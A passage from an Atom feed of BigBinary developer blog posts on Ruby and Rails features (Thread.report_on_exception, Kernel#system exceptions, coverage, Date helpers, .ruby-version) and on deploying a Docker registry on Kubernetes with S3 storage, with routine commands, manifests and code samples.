href="https://github.com/mperham/sidekiq/blob/6e79f2a860ae558f2ed52b8917d2fede846c0a50/Pro-4.0-Upgrade.md#whats-new">removed</a>in Sidekiq Pro 4.0and <a href="https://github.com/mperham/sidekiq/wiki/Reliability#notes">are not documented anywhere</a>.</p><h2>Final result</h2><p>We have enabled <code>super_fetch</code> in our application andit seemed to be working without any major issues so far.Our Kubernetes <code>background</code> pods does not seem tobe loosing any jobs when these pods are restarted.</p><p>Update : Mike Pheram, author of Sidekiq, posted following<a href="https://www.reddit.com/r/ruby/comments/8htnpe/increase_reliability_of_background_job_processing">comment</a>.</p><blockquote><p>Faktory provides all of the beanstalkd functionality, including the same reliability, with a nicer Web UI. It's free and OSS.https://github.com/contribsys/faktory http://contribsys.com/faktory/</p></blockquote>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 sets version in Gemfile & adds .ruby-version]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5_2-adds-ruby-version-file-and-ruby-version-to-gemfile-by-default"/>
      <updated>2018-05-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5_2-adds-ruby-version-file-and-ruby-version-to-gemfile-by-default</id>
      <content type="html"><![CDATA[<p>For Ruby developers, it's common to switch between multiple Ruby versions formultiple projects as per the needs of the project. Sometimes, the process ofgoing back and forth with multiple Ruby versions could be frustrating for thedeveloper. To avoid this we add<a href="https://rvm.io/workflow/projects#project-file-ruby-version">.ruby-version files</a>to our projects so that version manager tools such as <code>rvm</code>, <code>rbenv</code> etc. caneasily determine which Ruby version should be used for that particular project.</p><p>One other case that Rails developers have to take care of is ensuring that theRuby version used to run Rails by the deployment tools is the one that isdesired. In order to ensure that we<a href="https://devcenter.heroku.com/articles/ruby-versions">add ruby version to Gemfile</a>.This will help bundler install dependencies scoped to the specified Rubyversion.</p><h3>Good News! Rails 5.2 makes our work easy.</h3><p>In Rails 5.2,<a href="https://github.com/rails/rails/pull/30016">changes have been made</a> to introduce<code>.ruby-version</code> file and also add the Ruby version to Gemfile by default aftercreating an app.</p><p>Let's create a new project with Ruby 2.5 .</p><pre><code class="language-ruby">$ rvm list default  Default Ruby (for new shells)     ruby-2.5 [ x86_64 ]$ rails new my_new_app</code></pre><p>In our new project, we should be able to see <code>.ruby-version</code> in its rootdirectory and it will contain value <code>2.5</code>. Also, we should see following line inthe Gemfile.</p><pre><code class="language-ruby">ruby &quot;2.5&quot;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Deploying Docker Registry on Kubernetes using S3 Storage]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/deploying-docker-registry-on-kubernetes-using-s3-storage"/>
      <updated>2018-05-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/deploying-docker-registry-on-kubernetes-using-s3-storage</id>
      <content type="html"><![CDATA[<p>In today's era of containerization, no matter what container we are using weneed an image to run the container. Docker images are stored on containerregistries like Docker hub(cloud), Google Container Registry(GCR), AWS ECR,quay.io etc.</p><p>We can also self-host docker registry on any docker platform. In this blog post,we will see how to deploy docker registry on kubernetes using storage driver S3.</p><h4>Pre-requisite:</h4><ul><li><p>Access to working kubernetes cluster.</p></li><li><p>Understanding of <a href="http://kubernetes.io/">Kubernetes</a> terms like<a href="http://kubernetes.io/docs/user-guide/pods/">pods</a>,<a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a>,<a href="https://kubernetes.io/docs/concepts/services-networking/service/">services</a>,<a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/">configmap</a>and<a href="https://kubernetes.io/docs/concepts/services-networking/ingress/">ingress</a>.</p></li></ul><p>As per docker registry<a href="https://docs.docker.com/registry/deploying/">documentation</a>, We can simplystart the registry using docker image <code>registry</code>.</p><p>Basic parameters when deploying production registry are:</p><ul><li>Authentication</li><li>SSL</li><li>Storage</li></ul><p>We will use <strong>htpasswd</strong> authentication for this post though registry imagesupports <strong>silly</strong> and <strong>token</strong> based authentication as well.</p><p>Docker registry requires applications to use SSL certificate and key in theregistry. We will use kubernetes service, which terminates SSL on ELB levelusing annotations.</p><p>For registry storage, we can use filesystem, s3, azure, swift etc. For thecomplete list of options please visit<a href="https://docs.docker.com/registry/configuration/#storagedocker">docker site</a>site.</p><p>We need to store the docker images pushed to the registry. We will use S3 tostore these docker images.</p><h4>Steps for deploying registry on kubernetes.</h4><p>Get the <code>ARN</code> of the SSL certificate to be used for SSL.</p><p>If you don't have SSL on AWS IAM, upload it using the following command.</p><pre><code class="language-bash">$aws iam upload-server-certificate --server-certificate-name registry --certificate-body file://registry.crt --private-key file://key.pem</code></pre><p>Get the <code>arn</code> for the certificate using the command.</p><pre><code class="language-bash">$aws iam get-server-certificate --server-certificate-name registry  | grep Arn</code></pre><p>Create S3 bucket which will be used to store docker images using s3cmd or awss3.</p><pre><code class="language-bash">$s3cmd mb s3://myregistryBucket 's3://myregistry/' created</code></pre><p>Create a separate namespace, configmap, deployment and service for registryusing following templates.</p><pre><code class="language-yaml">---apiVersion: v1kind: Namespacemetadata:name: container-registry---apiVersion: v1kind: ConfigMapmetadata:  name: auth  namespace: container-registrydata:  htpasswd: |    admin:$2y$05$TpZPzI7U7cr3cipe6jrOPe0bqohiwgEerEB6E4bFLsUf7Bk.SEBRi---apiVersion: extensions/v1beta1kind: Deploymentmetadata:  labels:    app: registry  name: registry  namespace: container-registryspec:  replicas: 1  strategy:    type: RollingUpdate  template:    metadata:      labels:        app: registry    spec:      containers:        - env:            - name: REGISTRY_AUTH              value: htpasswd            - name: REGISTRY_AUTH_HTPASSWD_PATH              value: /auth/htpasswd            - name: REGISTRY_AUTH_HTPASSWD_REALM              value: Registry Realm            - name: REGISTRY_STORAGE              value: s3            - name: REGISTRY_STORAGE_S3_ACCESSKEY              value: &lt;your-s3-access-key&gt;            - name: REGISTRY_STORAGE_S3_BUCKET              value: &lt;your-registry-bucket&gt;            - name: REGISTRY_STORAGE_S3_REGION              value: us-east-1            - name: REGISTRY_STORAGE_S3_SECRETKEY              value: &lt;your-secret-s3-key&gt;          image: registry:2          name: registry          ports:            - containerPort: 5000          volumeMounts:            - name: auth              mountPath: /auth      volumes:        - name: auth          configMap:            name: auth---apiVersion: v1kind: Servicemetadata:  annotations:    service.beta.kubernetes.io/aws-load-balancer-ssl-cert: &lt;your-iam-certificate-arn&gt;    service.beta.kubernetes.io/aws-load-balancer-instance-protocol: http    service.beta.kubernetes.io/aws-load-balancer-ssl-ports: &quot;443&quot;  labels:    app: registry  name: registry  namespace: container-registryspec:  ports:    - name: &quot;443&quot;      port: 443      targetPort: 5000  selector:    app: registrytype: LoadBalancer</code></pre><p>Let's launch this manifest using <code>kubectl apply</code>.</p><pre><code class="language-bash">kubectl apply -f registry-namespace.yml registry-configmap.yml registry-deployment.yaml registry-namespace.ymlnamespace &quot;registry&quot; createdconfigmap &quot;auth&quot; createddeployment &quot;registry&quot; createdservice &quot;registry&quot; created</code></pre><p>Now that we have created registry, we should map DNS to web service ELBendpoint. We can get the webservice ELB endpoint using the following command.</p><pre><code class="language-bash">$kubectl -n registry get svc registry -o wideNAME       CLUSTER-IP      EXTERNAL-IP                                                               PORT(S)         AGE       SELECTORregistry   100.71.250.56   abcghccf8540698e8bff782799ca8h04-1234567890.us-east-2.elb.amazonaws.com   443:30494/TCP   1h       app=registry</code></pre><p>We will point DNS to this ELB endpoint with domain registry.myapp.com</p><p>Once we have registry running, now it's time to push the image to a registry.</p><p>First, pull the image or build the image locally to push.</p><p>On local machine run following commands:</p><pre><code class="language-bash">$docker pull busyboxlatest: Pulling from busyboxf9ea5e501ad7: Pull completeac3f08b78d4e: Pull completeDigest: sha256:da268b65d710e5ca91271f161d0ff078dc63930bbd6baac88d21b20d23b427ecStatus: Downloaded newer image for busybox:latest</code></pre><p>Now login to our registry using the following commands.</p><pre><code class="language-bash">$ sudo docker login registry.myapp.comUsername: adminPassword:Login Succeeded</code></pre><p>Now tag the image to point it to our registry using <code>docker tag</code> command</p><pre><code class="language-bash">$ sudo docker tag busybox registry.myapp.com/my-app:latest</code></pre><p>Once the image is tagged we are good to push.</p><p>Using the <code>docker push</code> command let's push the image.</p><pre><code class="language-bash">$ sudo docker push docker.gocloudlogistics.com/my-app:latestThe push refers to a repository [registry.myapp.com/my-app]05732a3f47b5: Pushed30de36c4bd15: Pushed5237590c0d08: Pushedlatest: digest: sha256:f112e608b2639b21498bd4dbca9076d378cc216a80d52287f7f0f6ea6ad739ab size: 205</code></pre><p>We are successfully able to push image to registry running on kunbernetes andstored on S3. Let's verify if it exists on S3.</p><p>Navigate to our s3 bucket and we can see the docker registry repository<code>busybox</code> has been created.</p><pre><code class="language-bash">$ s3cmd ls s3://myregistry/docker/registry/repositories/DIR   s3://myregistry/docker/registry/repositories/busybox/</code></pre><p>All our image related files are stored on S3.</p><p>In this way, we self-host container registry on kubernetes backed by s3 storage.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 added option to raise exception in Kernel#system]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-added-option-to-raise-exception-in-kernel-system"/>
      <updated>2018-04-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-added-option-to-raise-exception-in-kernel-system</id>
      <content type="html"><![CDATA[<p>We write scripts to automate setup and deployment of Rails applications. Inthose scripts, in many places, we need to run system commands like<code>bundle install</code>, <code>rake db:create</code>, <code>rake db:migrate</code> and many more.</p><p>Let's suppose we need to run migrations using <code>rake db:migrate</code> in a Railsproject setup script. We can use the <code>Kernel#system</code> method.</p><pre><code class="language-ruby">irb&gt; system('rake db:migrate')</code></pre><h4>Ruby 2.5.0</h4><p>Executing <code>system</code> returns <code>true</code> or <code>false</code>. Another feature of <code>system</code> isthat it eats up the exceptions.</p><p>Let's suppose our migrations can run successfully. In this case the <code>system</code>command for running migrations will return true.</p><pre><code class="language-ruby">irb&gt; system('rake db:migrate') =&gt; true</code></pre><p>Let's suppose we have a migration that is trying to add a column to a tablewhich does not exist. In this case, the <code>system</code> command for running migrationswill return false.</p><pre><code class="language-ruby">irb&gt; system('rake db:migrate')== 20180311211836 AddFirstNameToAdmins: migrating =============================-- add_column(:admins, :first_name, :string)rake aborted!StandardError: An error has occurred, this and all later migrations canceled:PG::UndefinedTable: ERROR:  relation &quot;admins&quot; does not exist: ALTER TABLE &quot;admins&quot; ADD &quot;first_name&quot; character varying...Tasks: TOP =&gt; db:migrate(See full trace by running task with --trace) =&gt; false</code></pre><p>As we can see, even when there is a failure in executing system commands, thereturn value is false. Ruby does not raise an exception in those cases.</p><p>However, we can use <code>raise</code> explicitly to raise an exception and halt the setupscript execution.</p><pre><code class="language-ruby">irb&gt; system('rake db:migrate') || raise('Failed to run migrations')== 20180311211836 AddFirstNameToAdmins: migrating =============================-- add_column(:admins, :first_name, :string)rake aborted!StandardError: An error has occurred, this and all later migrations canceled:PG::UndefinedTable: ERROR:  relation &quot;admins&quot; does not exist: ALTER TABLE &quot;admins&quot; ADD &quot;first_name&quot; character varying...Tasks: TOP =&gt; db:migrate(See full trace by running task with --trace)Traceback (most recent call last):        2: from /Users/amit/.rvm/rubies/ruby-2.5.0/bin/irb:11:in `&lt;main&gt;'        1: from (irb):4RuntimeError (Failed to run migrations)</code></pre><h4>Ruby 2.6.0-preview1</h4><p>Ruby 2.6 make our lives easier by providing an option <code>exception: true</code> so thatwe do not need to use <code>raise</code> explicitly to halt script execution.</p><pre><code class="language-ruby">irb&gt; system('rake db:migrate', exception: true)== 20180311211836 AddFirstNameToAdmins: migrating =============================-- add_column(:admins, :first_name, :string)rake aborted!StandardError: An error has occurred, this and all later migrations canceled:PG::UndefinedTable: ERROR:  relation &quot;admins&quot; does not exist: ALTER TABLE &quot;admins&quot; ADD &quot;first_name&quot; character varying...Tasks: TOP =&gt; db:migrate(See full trace by running task with --trace)Traceback (most recent call last):        3: from /Users/amit/.rvm/rubies/ruby-2.6.0-preview1/bin/irb:11:in `&lt;main&gt;'        2: from (irb):2        1: from (irb):2:in `system'RuntimeError (Command failed with exit 1: rake)</code></pre><p>Ruby 2.6 works the same way as previous Ruby versions when used without the<code>exception</code> option or used with <code>exception</code> set as false.</p><pre><code class="language-ruby">irb&gt; system('rake db:migrate', exception: false)== 20180311211836 AddFirstNameToAdmins: migrating =============================-- add_column(:admins, :first_name, :string)rake aborted!StandardError: An error has occurred, this and all later migrations canceled:PG::UndefinedTable: ERROR:  relation &quot;admins&quot; does not exist: ALTER TABLE &quot;admins&quot; ADD &quot;first_name&quot; character varying...Tasks: TOP =&gt; db:migrate(See full trace by running task with --trace) =&gt; false</code></pre><p>Here is the relevant <a href="https://github.com/ruby/ruby/commit/fb29cffab0">commit</a>and <a href="https://bugs.ruby-lang.org/issues/14386">discussion</a> for this change.</p><p><code>system</code> is not the only way to execute scripts like these. We wrote<a href="https://blog.bigbinary.com/2012/10/18/backtick-system-exec-in-ruby.html">a blog</a>6 years ago which discusses the differences between running commands using<code>backtick</code>, <code>exec</code>, <code>sh</code>, <code>popen3</code>, <code>popen2e</code> and <code>Process.spawn</code>.</p><p>The Chinese version of this blog is available<a href="http://madao.me/yi-ruby-2-6-kernel-de-system-fang-fa-zeng-jia-shi-fou-pao-chu-yi-chang-can-shu/">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 adds Thread.report_on_exception by default]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-enables-thread-report_on_exception-by-default"/>
      <updated>2018-04-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-enables-thread-report_on_exception-by-default</id>
      <content type="html"><![CDATA[<p>Let's see what happens when an exception is raised inside a thread.</p><pre><code class="language-ruby">division_thread = Thread.new do  puts &quot;Calculating 4/0 in division_thread&quot;  puts &quot;Result is: #{4/0}&quot;  puts &quot;Exiting from division_thread&quot;endsleep 1puts &quot;In the main thread&quot;</code></pre><p>Execution of it looks like this.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby thread_example_1.rbCalculating 4/0 in division_threadIn the main thread</code></pre><p>Note that the last two lines from the block were not printed. Also notice thatafter failing in the thread the program continued to run in main thread. That'swhy we got the message &quot;In the main thread&quot;.</p><p>This is because the default behavior of Ruby is to silently ignore exceptions inthreads and then to continue to execute in the main thread.</p><h2>Enabling abort_on_exception to stop on failure</h2><p>If we want an exception in a thread to stop further processing both in thethread and in the main thread then we can enable <code>Thread[.#]abort_on_exception</code>on that thread to achieve that.</p><p>Notice that in the below code we are using <code>Thread.current</code>.</p><pre><code class="language-ruby">division_thread = Thread.new do  Thread.current.abort_on_exception = true  puts &quot;Calculating 4/0 in division_thread&quot;  puts &quot;Result is: #{4/0}&quot;  puts &quot;Exiting from division_thread&quot;endsleep 1puts &quot;In the main thread&quot;</code></pre><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby thread_example_2.rbCalculating 4/0 in division_threadthread_example_2.rb:5:in `/': divided by 0 (ZeroDivisionError)  from thread_example_2.rb:5:in `block in &lt;main&gt;'</code></pre><p>As we can see once an exception was encountered in the thread then processingstopped on both in the thread and in the main thread.</p><p>Note that <code>Thread.current.abort_on_exception = true</code> activates this behavioronly for the current thread.</p><p>If we want this behavior globally for all the threads then we need to use<code>Thread.abort_on_exception = true</code>.</p><h2>Running program with debug flag to stop on failure</h2><p>Let's run the original code with <code>--debug</code> option.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby --debug thread_example_1.rbthread_example_1.rb:1: warning: assigned but unused variable - division_threadCalculating 4/0 in division_threadException `ZeroDivisionError' at thread_example_1.rb:3 - divided by 0Exception `ZeroDivisionError' at thread_example_1.rb:7 - divided by 0thread_example_1.rb:3:in `/': divided by 0 (ZeroDivisionError)  from thread_example_1.rb:3:in `block in &lt;main&gt;'</code></pre><p>In this case the exception is printed in detail and the code in main thread wasnot executed.</p><p>Usually when we execute a program with <code>--debug</code> option then the behavior of theprogram does not change. We expect the program to print more stuff but we do notexpect behavior to change. However in this case the <code>--debug</code> option changes thebehavior of the program.</p><h2>Running program with join on thread to stop on failure</h2><p>If a thread raises an exception and <code>abort_on_exception</code> and <code>$DEBUG</code> flags arenot set then that exception will be processed at the time of joining of thethread.</p><pre><code class="language-ruby">division_thread = Thread.new do  puts &quot;Calculating 4/0 in division_thread&quot;  puts &quot;Result is: #{4/0}&quot;  puts &quot;Exiting from division_thread&quot;enddivision_thread.joinputs &quot;In the main thread&quot;</code></pre><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby thread_example_3.rbCalculating 4/0 in division_threadthread_example_3.rb:3:in `/': divided by 0 (ZeroDivisionError)  from thread_example_3.rb:3:in `block in &lt;main&gt;'</code></pre><p>Both <code>Thread#join</code> and <code>Thread#value</code> will stop processing in the thread and inthe main thread once an exception is encountered.</p><h2>Introduction of report_on_exception in Ruby 2.4</h2><p>Almost 6 years ago, <a href="https://github.com/headius">Charles Nutter (headius)</a> hadproposed that the exceptions raised in threads should be automatically loggedand reported, by default. To make his point, he explained issues similar to whatwe discussed above about the Ruby's behavior of silently ignoring exceptions inthreads. <a href="https://bugs.ruby-lang.org/issues/6647">Here</a> is the relevantdiscussion on his proposal.</p><p>Following are some of the notable points discussed.</p><ul><li>Enabling <code>Thread[.#]abort_on_exception</code>, by default, is not always a goodidea.</li><li>There should be a flag which, if enabled, would print the thread-killingexception info.</li><li>In many cases, people spawn one-off threads which are not hard-referencedusing <code>Thread#join</code> or <code>Thread#value</code>. Such threads gets garbage collected.Should it report the thread-killing exception at the time of garbagecollection if such a flag is enabled?</li><li>Should it warn using<a href="https://ruby-doc.org/core-2.4.0/Warning.html#method-i-warn"><code>Warning#warn</code></a>or redirect to STDERR device while reporting?</li></ul><p>Charles Nutter suggested that a configurable global flag<code>Thread.report_on_exception</code> and instance-level flag<code>Thread#report_on_exception</code> should be implemented having its default value as<code>true</code>. When set to <code>true</code>, it should report print exception information.</p><p>Matz and other core members approved that <code>Thread[.#]report_on_exception</code> can beimplemented having its default value set to <code>false</code>.</p><p>Charles Nutter, Benoit Daloze and other people demanded that it should be <code>true</code>by default so that programmers can be aware of the silently disappearing threadsbecause of exceptions.</p><p>Shyouhei Urabe <a href="https://bugs.ruby-lang.org/issues/6647#note-41">advised</a> thatdue to some technical challenges, the default value should be set to <code>false</code> soas this feature could land in Ruby. Once this feature is in then the defaultvalue can be changed in a later release.</p><p><a href="https://github.com/nobu">Nobuyoshi Nakada (nobu)</a> pushed an<a href="https://github.com/ruby/ruby/commit/2e71c752787e0c7659bd5e89b6c5d433eddfe13a">implementation</a>for <code>Thread[.#]report_on_exception</code> with a default value set to <code>false</code>. It wasreleased in Ruby 2.4.0.</p><p>Let's try enabling <code>report_on_exception</code> globally using<code>Thread.report_on_exception</code>.</p><pre><code class="language-ruby">Thread.report_on_exception = truedivision_thread = Thread.new do  puts &quot;Calculating 4/0 in division_thread&quot;  puts &quot;Result is: #{4/0}&quot;  puts &quot;Exiting from division_thread&quot;endaddition_thread = Thread.new do  puts &quot;Calculating nil+4 in addition_thread&quot;  puts &quot;Result is: #{nil+4}&quot;  puts &quot;Exiting from addition_thread&quot;endsleep 1puts &quot;In the main thread&quot;</code></pre><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby thread_example_4.rbCalculating 4/0 in division_thread#&lt;Thread:0x007fb10f018200@thread_example_4.rb:3 run&gt; terminated with exception:thread_example_4.rb:5:in `/': divided by 0 (ZeroDivisionError)  from thread_example_4.rb:5:in `block in &lt;main&gt;'Calculating nil+4 in addition_thread#&lt;Thread:0x007fb10f01aca8@thread_example_4.rb:9 run&gt; terminated with exception:thread_example_4.rb:11:in `block in &lt;main&gt;': undefined method `+' for nil:NilClass (NoMethodError)In the main thread</code></pre><p>It now reports the exceptions in all threads. It prints that the<code>Thread:0x007fb10f018200</code> was<code>terminated with exception: divided by 0 (ZeroDivisionError)</code>. Similarly,another thread <code>Thread:0x007fb10f01aca8</code> was<code>terminated with exception: undefined method '+' for nil:NilClass (NoMethodError)</code>.</p><p>Instead of enabling it globally for all threads, we can enable it for aparticular thread using instance-level <code>Thread#report_on_exception</code>.</p><pre><code class="language-ruby">division_thread = Thread.new do  puts &quot;Calculating 4/0 in division_thread&quot;  puts &quot;Result is: #{4/0}&quot;  puts &quot;Exiting from division_thread&quot;endaddition_thread = Thread.new do  Thread.current.report_on_exception = true  puts &quot;Calculating nil+4 in addition_thread&quot;  puts &quot;Result is: #{nil+4}&quot;  puts &quot;Exiting from addition_thread&quot;endsleep 1puts &quot;In the main thread&quot;</code></pre><p>In the above case we have enabled <code>report_on_exception</code> flag just for<code>addition_thread</code>.</p><p>Let's execute it.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby thread_example_5.rbCalculating 4/0 in division_threadCalculating nil+4 in addition_thread#&lt;Thread:0x007f8e6b007f70@thread_example_5.rb:7 run&gt; terminated with exception:thread_example_5.rb:11:in `block in &lt;main&gt;': undefined method `+' for nil:NilClass (NoMethodError)In the main thread</code></pre><p>Notice how it didn't report the exception which killed thread <code>division_thread</code>.As expected, it reported the exception that killed thread <code>addition_thread</code>.</p><p>With the above changes ruby reports the exception as soon as it encounters.However if these threads are joined then they will still raise exception.</p><pre><code class="language-ruby">division_thread = Thread.new do  Thread.current.report_on_exception = true  puts &quot;Calculating 4/0 in division_thread&quot;  puts &quot;Result is: #{4/0}&quot;  puts &quot;Exiting from division_thread&quot;endbegin  division_thread.joinrescue =&gt; exception  puts &quot;Explicitly caught - #{exception.class}: #{exception.message}&quot;endputs &quot;In the main thread&quot;</code></pre><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby thread_example_6.rbCalculating 4/0 in division_thread#&lt;Thread:0x007f969d00d828@thread_example_6.rb:1 run&gt; terminated with exception:thread_example_6.rb:5:in `/': divided by 0 (ZeroDivisionError)  from thread_example_6.rb:5:in `block in &lt;main&gt;'Explicitly caught - ZeroDivisionError: divided by 0In the main thread</code></pre><p>See how we were still be able to handle the exception raised in<code>division_thread</code> above after joining it despite it reported it before due to<code>Thread#report_on_exception</code> flag.</p><h2>report_on_exception defaults to true in Ruby 2.5</h2><p><a href="https://github.com/eregon">Benoit Daloze (eregon)</a> strongly advocated that boththe <code>Thread.report_on_exception</code> and <code>Thread#report_on_exception</code> should havedefault value as <code>true</code>. <a href="https://bugs.ruby-lang.org/issues/14143">Here</a> is therelevant feature request.</p><p>After <a href="https://bugs.ruby-lang.org/issues/14143#note-9">approval from Matz</a>,Benoit Daloze pushed the<a href="https://github.com/ruby/ruby/search?utf8=%E2%9C%93&amp;q=Feature+%5C%2314143&amp;type=Commits">implementation</a>by fixing the failing tests and silencing the unnecessary verbose warnings.</p><p>It was released as part of Ruby 2.5.</p><p>Now in ruby 2.5 we can simply write like this.</p><pre><code class="language-ruby">division_thread = Thread.new do  puts &quot;Calculating 4/0 in division_thread&quot;  puts &quot;Result is: #{4/0}&quot;  puts &quot;Exiting from division_thread&quot;endaddition_thread = Thread.new do  puts &quot;Calculating nil+4 in addition_thread&quot;  puts &quot;Result is: #{nil+4}&quot;  puts &quot;Exiting from addition_thread&quot;endsleep 1puts &quot;In the main thread&quot;</code></pre><p>Let's execute it with Ruby 2.5.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.5.0 ruby thread_example_7.rbCalculating 4/0 in division_thread#&lt;Thread:0x00007f827689a238@thread_example_7.rb:1 run&gt; terminated with exception (report_on_exception is true):Traceback (most recent call last):  1: from thread_example_7.rb:3:in `block in &lt;main&gt;'thread_example_7.rb:3:in `/': divided by 0 (ZeroDivisionError)Calculating nil+4 in addition_thread#&lt;Thread:0x00007f8276899b58@thread_example_7.rb:7 run&gt; terminated with exception (report_on_exception is true):Traceback (most recent call last):thread_example_7.rb:9:in `block in &lt;main&gt;': undefined method `+' for nil:NilClass (NoMethodError)In the main thread</code></pre><p>We can disable the thread exception reporting globally using<code>Thread.report_on_exception = false</code> or for a particular thread using<code>Thread.current.report_on_exception = false</code>.</p><h2>Future Possibilities</h2><p>In addition to this feature, Charles Nutter also<a href="https://bugs.ruby-lang.org/issues/14143#note-4">suggested</a> that it will be goodif there exists a callback handler which can accept a block to be executed whena thread dies due to an exception. The callback handler can be at global levelor it can be for a specific thread.</p><pre><code class="language-ruby">Thread.on_exception do  # some stuffend</code></pre><p>In the absence of such handler libraries need to resort to custom code to handleexceptions.<a href="https://github.com/mperham/sidekiq/blob/a60a91d3dd857592a532965f0701d285f13f28f1/lib/sidekiq/util.rb#L15-L27">Here is how</a>Sidekiq handles exceptions raised in threads.</p><p>Important thing to note is that <code>report_on_exception</code> does not change behaviorof the code. It does more reporting when a thread dies and when it comes tothread dies more reporting is a good thing.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 Date#prev_occurring & Date#next_occurring]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-adds-date-methods-to-return-specified-next-or-previous-occurring-day-of-week"/>
      <updated>2018-04-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-adds-date-methods-to-return-specified-next-or-previous-occurring-day-of-week</id>
      <content type="html"><![CDATA[<p>Before Rails 5.2, this is how we would write to find next or previous occurringday of the week.</p><p><strong>Assume that current date is Tue, 27 Feb 2018.</strong></p><pre><code class="language-ruby"># find previous thursday&gt;&gt; Date.yesterday.beginning_of_week(:thursday)=&gt; Thu, 22 Feb 2018# find next thursday&gt;&gt; Date.tomorrow.end_of_week(:friday)=&gt; Thu, 01 Mar 2018</code></pre><p>Rails 5.2 has <a href="https://github.com/rails/rails/pull/26600">introduced methods</a><code>Date#prev_occurring</code> and <code>Date#next_occurring</code> to find next &amp; previousoccurring day of the week.</p><pre><code class="language-ruby"># find previous thursday&gt;&gt; Date.prev_occurring(:thursday)=&gt; Thu, 22 Feb 2018# find next thursday&gt;&gt; Date.next_occurring(:thursday)=&gt; Thu, 01 Mar 2018</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 supports measuring branch and method coverages]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-supports-measuring-branch-and-method-coverages"/>
      <updated>2018-04-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-supports-measuring-branch-and-method-coverages</id>
      <content type="html"><![CDATA[<p>Ruby comes with<a href="https://ruby-doc.org/stdlib-2.5.0/libdoc/coverage/rdoc/Coverage.html">Coverage</a>,a simple standard library for test coverage measurement for a long time.</p><h2>Before Ruby 2.5</h2><p>Before Ruby 2.5, we could measure just the line coverage using <code>Coverage</code>.</p><p>Line coverage tells us whether a line is executed or not. If executed, then howmany times that line was executed.</p><p>We have a file called <code>score.rb</code>.</p><pre><code class="language-ruby">score = 33if score &gt;= 40  p :PASSEDelse  p :FAILEDend</code></pre><p>Now create another file <code>score_coverage.rb</code>.</p><pre><code class="language-ruby">require &quot;coverage&quot;Coverage.startload &quot;score.rb&quot;p Coverage.result</code></pre><p>We used <code>Coverage#start</code> method to measure the coverage of <code>score.rb</code> file.<code>Coverage#result</code> returns the coverage result.</p><p>Let's run it with Ruby 2.4.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby score_coverage.rb:FAILED{ &quot;score.rb&quot;=&gt; [1, nil, 1, 0, nil, 1, nil] }</code></pre><p>Let's look at the output. Each value in the array <code>[1, nil, 1, 0, nil, 1, nil]</code>denotes the count of line executions by the interpreter for each line in<code>score.rb</code> file.</p><p>This array is also called the &quot;line coverage&quot; of <code>score.rb</code> file.</p><p>A <code>nil</code> value in line coverage array means coverage is disabled for thatparticular line number or it is not a relevant line. Lines like <code>else</code>, <code>end</code>and blank lines have line coverage disabled.</p><p>Here's how we can read above line coverage result.</p><ul><li>Line number 1 (i.e. 0th index in the above result array) was executed once.</li><li>Coverage was disabled for line number 2 (i.e. index 1) as it is blank.</li><li>Line number 3 (i.e. index 2) was executed once.</li><li>Line number 4 did not execute.</li><li>Coverage was disabled for line number 5 as it contains only <code>else</code> clause.</li><li>Line number 6 was executed once.</li><li>Coverage was disabled for line number 7 as it contains just <code>end</code> keyword.</li></ul><h2>After Ruby 2.5</h2><p>There was a <a href="https://github.com/ruby/ruby/pull/511">pull request</a> opened in 2014to add method coverage and decision coverage metrics in Ruby. It was<a href="https://github.com/ruby/ruby/pull/511#issuecomment-328753499">rejected</a> by<a href="https://github.com/mame">Yusuke Endoh</a> as he saw some issues with it andmentioned that he was also working on a similar implementation.</p><p>In Ruby 2.5, Yusuke Endoh<a href="https://bugs.ruby-lang.org/issues/13901">added branch coverage and method coverage feature</a>to the <code>Coverage</code> library.</p><p>Let's see what's changed in <code>Coverage</code> library in Ruby 2.5.</p><h3>Line Coverage</h3><p>If we execute above example using Ruby 2.5, we will see no change in the result.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.5.0 ruby score_coverage.rb:FAILED{ &quot;score.rb&quot; =&gt; [1, nil, 1, 0, nil, 1, nil] }</code></pre><p>This behavior is maintained to ensure that the <code>Coverage#start</code> API stays 100%backward compatible.</p><p>If we explicitly enable <code>lines</code> option on <code>Coverage#start</code> method in the above<code>score_coverage.rb</code> file, the coverage result will be different now.</p><pre><code class="language-ruby">require &quot;coverage&quot;Coverage.start(lines: true)load &quot;score.rb&quot;p Coverage.result</code></pre><pre><code class="language-ruby">$ RBENV_VERSION=2.5.0 ruby score_coverage.rb:FAILED{ &quot;score.rb&quot; =&gt; {    :lines =&gt; [1, nil, 1, 0, nil, 1, nil]  